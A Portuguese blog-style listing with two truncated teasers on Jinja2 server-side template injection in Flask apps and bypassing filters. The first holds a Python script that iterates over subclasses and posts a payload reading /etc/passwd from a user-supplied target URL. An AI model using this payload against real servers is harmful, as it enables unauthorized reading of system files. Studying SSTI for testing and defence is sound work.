Injeção de SSTI em aplicações Flask e como contornar

Exploração da classe FileLoader: import requests url = input('Digite a URL do alvo: ') for i in range(500): payload = f"{{{{''.__class__.__bases__[0].__subclasses__()[{i}].get_data(0, '/etc/passwd')}}}}" try: response = requests.post(url, data={"name": payload}) if response.status_code == 200 and '_fr ...

Publicado em 8-5 12:37

Explorando e Contornando Injeções de Template SSTI com Jinja2

Este artigo explora as vulnerabilidades de Server-Side Template Injection (SSTI) utilizando o Jinja2, um popular motor de templates para Python, e as técnicas para contornar filtros de segurança. Ambiente de Teste e Exploração Inicial Para iniciar a exploração, é necessário encontrar classes e métodos acessíveis. Um método comum é iterar sobre ...

Publicado em 6-12 23:48